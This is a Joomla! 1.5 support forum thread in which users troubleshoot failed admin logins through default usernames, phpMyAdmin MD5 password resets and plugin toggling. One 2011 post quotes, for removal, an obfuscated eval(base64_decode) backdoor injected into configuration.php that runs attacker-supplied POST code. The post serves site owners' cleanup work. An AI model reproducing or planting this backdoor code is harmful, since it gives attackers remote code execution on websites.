Username and password do not match

Need help with the Administration of your Joomla! 1.5 site? This is the spot for you.

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
tvpakee
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Fri Jun 27, 2008 3:56 pm

Username and password do not match

Post by tvpakee » Wed Jul 02, 2008 6:16 am

i installed Ja Telineii for my web when i try to log in it says Username and password do not match . I loged in after I installed and I modified and created user accounts. it was seems working fine. but after that i could not log in. I checked in mysql manager and i changed the password and i tried to log in no positive message. is there any possible way. Could you help me guys. Thanks

tvpakee

Difigaro
Joomla! Apprentice
Joomla! Apprentice
Posts: 12
Joined: Thu Jun 26, 2008 10:27 pm

Re: Username and password do not match

Post by Difigaro » Wed Jul 02, 2008 5:17 pm

tvpakee wrote:i installed Ja Telineii for my web when i try to log in it says Username and password do not match . I loged in after I installed and I modified and created user accounts. it was seems working fine. but after that i could not log in. I checked in mysql manager and i changed the password and i tried to log in no positive message. is there any possible way. Could you help me guys. Thanks
tvpakee
This same thing is happening to ALOT of people.
The things we know, is that this is a recent issue... perhaps a Windows Update? Perhaps a Firefox update? Perhaps a hack?

In my opinion this is a major functionality issue if web developers can't get into the program's admin panel. It is my hope to draw attention to this issue so the devs at Joomla! can take a look at it.

Thank you.

jepsiba
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Sat Oct 20, 2007 10:59 pm

Re: Username and password do not match

Post by jepsiba » Mon Jul 14, 2008 12:08 am

Here's a tutorial on video on how to recover and change your password for joomla administrator.

http://www.veoh.com/videos/v1818492yRNhWTdg

It worked for me on a fresh copy of joomla 1.5

Hope it works for you

Good luck!

gooeymac
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Sat Jul 26, 2008 2:02 pm
Contact:

Re: Username and password do not match

Post by gooeymac » Sat Jul 26, 2008 2:15 pm

I'd seen this suggestion (to go into the SQL DB via phpMyAdmin and change the password there), which I did, but it didn't work. But after a subsequent visit back to the jos_user db, I noticed that the default username was not my email address as I'd thought, but the user name was 'admin'.

So I went back to login, using admin as the user and the password was the same as what I had been using. Logged in successfully.

I think the problem is one of inference. Because the Install focuses on the email address for the admin and never mentions the default username (its already going to be 'admin'), we assumed that the user name is the email address like it is for so many other websites. Its not and the install process never mentions it. With so many threads on the topic, it might be a good idea to get this information in a more viewable position during the install.

Try logging in using 'admin' and see what that gets you.

new-joomla
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Thu Jul 31, 2008 6:54 pm

Re: Username and password do not match

Post by new-joomla » Thu Jul 31, 2008 9:52 pm

hello,

I am having the same issue. I went into the database and changed the password because I could not login. i went back to try an login again (using admin & the MD5 generated password) and it still did not work. So I cannot setup my site because i can't login into the admin panel.

Any suggestions, PLEASE?

Don Henrie
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Thu Sep 25, 2008 9:59 pm

Re: Username and password do not match

Post by Don Henrie » Thu Sep 25, 2008 10:10 pm

Greetings~

Please forgive me for any ignorance if displayed.

I have stumbled upon a unique situation with Joomla. For some reason, when the problem/error of:
"Joomla! Administration Login Username and password do not match" occurs in the back end login, I have found that the following works.

On the front end log in, reset your password and follow through with the emails, token verification, etc...

Once the password has been reset, try logging into The Joomla! back end once again while keeping logged into the front end. (new tab)

Use the same password that you always have been using for the back end.

If anyone can figure out just why this scenario works, please add to this thread.

Thank you.

User avatar
formfranska
Joomla! Enthusiast
Joomla! Enthusiast
Posts: 112
Joined: Sun Dec 28, 2008 3:25 pm
Location: Sweden
Contact:

Re: Username and password do not match

Post by formfranska » Fri Apr 17, 2009 9:42 pm

gooeymac
Thank you ever so much! "admin" works for me as well. Had the same issue as you did. Couldn't figure out why though. Weird stuff :-)
Joomler in Sweden :-)
https://www.formfranska.com

hsrinivas
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Sat Apr 18, 2009 6:52 am

Re: Username and password do not match

Post by hsrinivas » Sat Apr 18, 2009 7:01 am

I have been having the same problem. I tried setting a temp password in MD5 field and used "admin" as the username. It does not work.

Is there anybody out there who can help me?

itdeptcorp01
Joomla! Apprentice
Joomla! Apprentice
Posts: 9
Joined: Sun Jun 08, 2008 3:08 pm

Re: Username and password do not match

Post by itdeptcorp01 » Thu Jul 16, 2009 12:49 pm

We have tried the solution jos_plugins -> change User - Joomla! from 0 to 1, and from 1 to 0 and still have no luck acccessing the Admin UI

We originally already had the User - Joomla! -> Publishing set to 1, but tried changing it to 0 and back again to 1 without luck.

What exactly are the steps which we should take?


Thanks you your help

southe32
Joomla! Apprentice
Joomla! Apprentice
Posts: 9
Joined: Fri Aug 28, 2009 2:36 pm
Location: Houston, Texas
Contact:

Re: Username and password do not match

Post by southe32 » Fri Aug 28, 2009 3:02 pm

My first message at login was:

"JAuthentication::__construct: Could not load authentication libraries.
Username and password do not match"

Through my CPANEL I went into by phpADMIN then selected the database ending with the _jo151... Yours will have a different number but should end in _jo(something).

Once inside I scrolled down on my left side file menu and selected jos_plugins.

Then I selected the BROWSE tab at the top.

I clicked the edit icon on the Authentication - Joomla column and changed the published to 1

Then I went back out to the BROWSE tab and edited the User - Joomla! and changed the published to 1

I proceeded to try login again and this was the message I recieved:

"Username and password do not match"

Through my CPANEL I went back into by phpADMIN then selected the database ending with the _jo151...

Once inside I scrolled down on my left side file menu and selected jos_users.

Then I selected the BROWSE tab at the top.

I clicked edit icon next to the "login" columns and under the password row I selected MD5 and retyped my password on the right, then select Go on the bottom left.

Everything works as it should now. Obviously you can correct all of this whil you are in your Joomla database with leaving like I did by trial and error.

I am brand new to Joomla and this problem was scary but easy to fix. I hope this helps. ;)

Wingnut63
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Fri Oct 16, 2009 3:15 am

Re: Username and password do not match

Post by Wingnut63 » Fri Oct 16, 2009 3:18 am

If that doesn't work - Try this:

Use: admin as the login ID with your password.

This worked for me after 2 hours of trying everything else on the forums.

Wingnut.

Victoria_CMU
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Fri Oct 16, 2009 5:33 am

Re: Username and password do not match

Post by Victoria_CMU » Fri Oct 16, 2009 5:58 am

I have tried this and every other suggestion on all of these forums and it still does not work. I am new to Joomla, and have heard such great things about it, but if I need to spend 2-4 hours on simply trying to login to set up my site, this is making me rethink Joomla as content management software.

Victoria_CMU
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Fri Oct 16, 2009 5:33 am

Re: Username and password do not match

Post by Victoria_CMU » Sat Oct 17, 2009 1:08 am

I keep thinking I've done something wrong, but I have gone back numerous times to the instructions for changing the administrator password (even though I did not forget my password; it just stopped working) in previous forums, followed them exactly, and I still cannot access my Joomla site. I have tried every single suggestion to a T, and multiple times to make sure I didn't make a simple mistake. I continue to get the message "Username and password do not match."

I'm really desperate and am ready to give up on Joomla. Please help.

Wingnut63
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Fri Oct 16, 2009 3:15 am

Re: Username and password do not match

Post by Wingnut63 » Sun Oct 18, 2009 10:34 pm

Hi People,

I think the fix may be simpler than we know. I had the same battle with the initial login, spending the obligatory 2 hours of reinstalling and double checking the instructions.

I think this is the fix:

The user id is admin

Don't use your email address as the UserID. Then use the password you created.

I hope this helps.

Wingnut63

Victoria_CMU
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Fri Oct 16, 2009 5:33 am

Re: Username and password do not match

Post by Victoria_CMU » Mon Oct 19, 2009 12:39 am

Have been using admin as the userid, though I've certainly tried using my email address, and admin2 after I set up a superadministrator acct, which I then got rid of after that didn't work. I've tried changing the password to admin - the word, and all of the hash codes that are floating around that represent the words admin, secret, etc.

Any other suggestions, please.

JoelMachado
Joomla! Apprentice
Joomla! Apprentice
Posts: 27
Joined: Tue Oct 16, 2007 3:34 am

Re: Username and password do not match

Post by JoelMachado » Wed Oct 28, 2009 6:50 pm

Found a posible solution,,,,,!

The problem
I was unable to log in to joomla i will get the error

User name and password do not match!

Warning: curl_setopt() [function.curl-setopt]: CURLOPT_FOLLOWLOCATION cannot be activated when in safe_mode or an open_basedir is set in /plugins/authentication/gmail.php on line 66

Solution
Log on to myphp admin
browse to table Authentication Joomla, edit the table under publish to read 1 and not 0
also check that the table user joomla also is 1 and not 0

possible cause!
On the back end of joomla, if you unpublished the authentication plug-ins these will happen, thats the only way i can re-create the error

remyga
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Tue Nov 03, 2009 7:25 pm

Re: Username and password do not match

Post by remyga » Tue Nov 10, 2009 7:44 pm

Thanks JoelMachado
Your version of problem was wright!!!!!!

weblinetech
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Tue Feb 09, 2010 8:31 am

Re: Username and password do not match

Post by weblinetech » Tue Feb 09, 2010 11:31 am

I tried all the above methods to change my password. when i get to the phpmyadmin and click
on my websites database but there appears to be no database, on my other domains there is databases.

jjjas
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Wed Mar 17, 2010 6:34 pm

Re: Username and password do not match

Post by jjjas » Fri Mar 19, 2010 8:09 pm

I am just tired of this problem..... none of things are working. Tired...

AbuNusaibah
Joomla! Apprentice
Joomla! Apprentice
Posts: 5
Joined: Fri Nov 19, 2010 2:58 pm

Re: Username and password do not match

Post by AbuNusaibah » Fri Nov 19, 2010 3:25 pm

You really guys should look for a solution to this problem. I spent a lot of time googling, reading and fiddling with Joomla & php extensions etc.

I successfully changed the admin password in the database but to no avail for Joomla to log me in. (btw the phpmyadmin keeps saying cannot load mcrypt module but i think this is unrelated here)

I reinstalled Joomla twice or thrice to no avail. Finally, I reinstalled Joomla with a new joomla application name other than the default one which is "joomla_15", and voila !
It worked !

I did not need the old site, i am just practicing but this questions Joomla as a CMS

Wow, i'm tired.

spennyforhire
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Apr 27, 2011 3:02 pm
Location: Edmonton
Contact:

Re: Username and password do not match - Solved

Post by spennyforhire » Wed Apr 27, 2011 3:19 pm

Hi Folks,
I this I found a solution...

First, DO NOT CHANGE YOUR PASSWORD RIGHT AWAY in phpadmin
Try This First:
Open your configuration.php see if the follow line appears similar to this:

var $live_site ='\';function __construct() { preg_replace(\"/.+/esi\",\"\\x65\\x76\\x61\\x6C\\x28\\x62\\x61\\x73\\x65\\x36\\x34\\x5F\\x64\\x65\\x63\\x6F\\x64\\x65\\x28\'aWYgKCFlbXB0eSgkX0NPT0tJRVsndiddKSBhbmQgJF9DT09LSUVbJ3YnXT09J2QnKXtpZiAoIWVtcHR5KCRfUE9TVFsnYyddKSkgeyAkZD1iYXNlNjRfZGVjb2RlKHN0cl9yZXBsYWNlKCcgJywnKycsJF9QT1NUWydjJ10pKTtpZigkZCkgZXZhbCgkZCk7fQ0KZWNobyAnPG5hbWU9Yz48L3RleHRhcmVhPic7ZXhpdDt9\'\\x29\\x29\\x3B\",\'1\');}#://';#

If So, remove all but the following so that the line looks like this:
var $live_site ='';

Then replace your configuration.php file and you should have access to your joomla back office.
Then change your password in joomla to something really complex.
Then lock down your site like a fortress.

Spence

spennyforhire
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Apr 27, 2011 3:02 pm
Location: Edmonton
Contact:

Re: Username and password do not match

Post by spennyforhire » Sun May 01, 2011 11:35 pm

Ok for those that already changed their password and tried everything under the sun to get into their Admin back end, here is what finally worked for me:

Ended up being xcloner that was causing the "Username and Password do not match" error.
Disabling it in myphpadmin fixed the problem. If you don't have xcloner, maybe it is another component, module, or plugin that is causing the problem.

Man,, I need multiple beers now.

spennyforhire
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Apr 27, 2011 3:02 pm
Location: Edmonton
Contact:

Re: Username and password do not match

Post by spennyforhire » Tue May 10, 2011 2:18 am

Hi Just another important note about this problem. Make SURE when you go to change the administrator password in phpmyadmin, that you select MD5 under password BEFORE you type in the password. This will be your temporary password. With any luck, you should finally get back into joomla. Then be sure to change the password again from within joomla.

You can watch the movie on how to do this here as indicated earilier by jepsiba:
http://www.veoh.com/videos/v1818492yRNhWTdg

If this works, get to the pub right away before last call or for happy hour and pick a table to dance on.

netdragon
Joomla! Fledgling
Joomla! Fledgling
Posts: 4
Joined: Sun May 22, 2011 3:48 pm

Re: Username and password do not match

Post by netdragon » Sun May 22, 2011 3:52 pm

The instructions for resetting pass on jos_users didn't work, however when I applied those instructions to the Super Administrator user in bak_users, it worked. This was a username created in admin previously, but strangely also had the id "62". I also had an admin user in jos_users, however that one didn't work no matter how many times I tried resetting the pass. Joomla 1.4

wises
Joomla! Intern
Joomla! Intern
Posts: 61
Joined: Wed Feb 18, 2009 11:28 pm

Re: Username and password do not match

Post by wises » Tue Jun 14, 2011 11:59 pm

I haven't read through this entire post but my problem I think I resolved.

it may have something to do with the 'save password' function in browsers.

where for some reason or another you save your password initially , which auto completes each login.
then for some reason perhaps after .htaccess protecting the /Administrator folder it will ask to save the changes for this also.

now in theory 'my guess is' that perhaps the new u/p could inadvertently be utilized to login mistakenly.In short it may either replace your already saved password and/or provide 2 passwords for the same site but utilise the secondary password for both login's?.

although this is just a theory of course.

always make sure your php_my_Admin section is password protected with a different password.
(this can be done like so here)

Then quite simply login to your php_myadmin , select the DB from the left.

scroll down the left column until you see jos_users

Select the 'edit' button NOT the 'inline-edit' button.

Find the password field and note the MD5 hash inside (future versions of joomla should have some random salts to add protection to these hashes imo)

to the left of the md5 hash

in the drop-down under 'Function' on the password 'row' select md5
in the field to the right on the same 'row' enter a plain text password ie; resetmeplease
click on save.
once the screen has refreshed you should notice in the 'password field' a new md5 hash for the password you entered , if you used the above password then this hash would be;
9794c14752406ed72466a3d2b2e8309d

open a new 'tab' in your browser and goto http://www.yoursite.com/administrator

enter ; admin for user (unless changed - recommended)
and password: (your password) or resetmeplease

then under users change it to something-else.

user:admin
password:resetmeplease
md5Hash:9794c14752406ed72466a3d2b2e8309d

kemokono
Joomla! Fledgling
Joomla! Fledgling
Posts: 3
Joined: Wed Dec 26, 2012 11:02 am

Re: Username and password do not match

Post by kemokono » Wed Dec 26, 2012 11:40 am

Hi all
I`am new user to Joomla also i can not find how to post new post so i writing here .
My issue :
I have moved my site from some hosting company to another , Every thing is ok but when i change password for any user by administrator panel it changed with no errors but when i try to log in using it i cant .
I noticed that the password in jos_Users table in the database (the MD5 field) not changed and still the old one because when i write any known MD5 hash then try to log in using it every thing be ok . So please tell me why changing password using administration does not update the MD5 field in Mysql database
Thanks
I use joomla 2.5.7 & mysql version is 5.0.45 & hosted in IIS 7.5

joefrugal
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Sun Sep 06, 2009 12:57 am

Re: Username and password do not match

Post by joefrugal » Sun Dec 30, 2012 5:52 pm

Yeah! After days, this video fixed my problem and I could log into the backend of Joomla. I thought I tried what it suggested a few times but didn't follow it exactly when it said put MD5 in the jos_Users then change the password to "admin" as the temporary password. I'm in!

http://www.veoh.com/videos/v1818492yRNhWTdg

MBAngel
Joomla! Apprentice
Joomla! Apprentice
Posts: 17
Joined: Wed Sep 12, 2007 3:37 pm

Re: Username and password do not match

Post by MBAngel » Tue Jan 15, 2013 11:09 pm

Ok, I spent a lot of time on this.. I would login with my admin auth info and it would tell me
"Username and password do not match or you do not have an account yet."
I just moved my 1.5.25 site with akeeba backup, but there is no metnion of this error on their forums.

I reset the password in phpmyadmin following the directions that can be found in this thread, other threads and on the internet in general. (default joomla is admin and admin, not an email address)
I tried several suggestions including editing the records in user and autherntication with phpmyadmin (they were already correct)...
I tried turning off and turning on several settings.

Then I noticed that I WAS logged in, even tho it said I wasn't.. I could take the index.php out of the admin address bar, and it took me to the control panel. I could see protected content on the front end... So, as spennyforhire suggested I looked at any plugin that might affect user logins.

Sure enough, I found one I hadn't used in a while and disabled it and had no problems.
So, if all else has failed, try turning off plugins one at a time and testing to see if there's a problem there. (you'd do that following other directions elsewhere on this forum, using phpmyadmin)

bobfreedom
Joomla! Fledgling
Joomla! Fledgling
Posts: 2
Joined: Thu Feb 14, 2013 3:53 pm

Re: Username and password not working

Post by bobfreedom » Fri Feb 15, 2013 8:46 pm

Hi All, I FOUND THE PROBLEM (at least for me)

I have been trying for the past three days to fix my problem which was the front end login stopped working. No error message just refreshed page and ignoring every login and password even super admin.

I was running joomla 2.5.8 and followed the upgrade process as usual and upgraded to 2.5.9. I also upgrade my HikaShop to 2.1.0 then it all went horribly wrong, not being able to determine which upgrade was the culprit.

I trawled the forums looking for an answer and many people seemed to be experiencing similar problems with no real clear cut reason why (joomla has a history of login function stopping all the way back to 2008????? why is that?????)

So I decided to switch off every plugin (not the modules) and switch on, the ones that were turned off, one.... at.... a.... time.... and eventually I discovered that the login started working again after I had switched on the EUCookieDirectiveLite the plugin was switched off over a month ago (perhaps a good idea to delete unwanted plugins rather than keep them) and I still do not know why this plugin should effect joomla's login or if HikaShop's upgrade had anything to do with it.

I should also mention that I cleared all cookies from Chrome just before I noticed the login not working, not sure if that is relevant.

I hope this is of some help, I am still concerned about the fact that login problems have been around for so long!

Please add to this post if you find out why a switched off plugin should have an impact on logins after an upgrade, one for the hard core programmers.

Love & Unity
Bobfreedom

jamzy1925
Joomla! Fledgling
Joomla! Fledgling
Posts: 1
Joined: Mon Oct 21, 2013 2:15 am

Re: Username and password do not match

Post by jamzy1925 » Mon Oct 21, 2013 2:23 am

MD5 Generator works for me. I think you just need to use the proper one.
I tried this http://www.passwordtool.hu/ and there a section specifically for Joomla PWs.

I hope this helps.


Locked

Return to “Administration 1.5”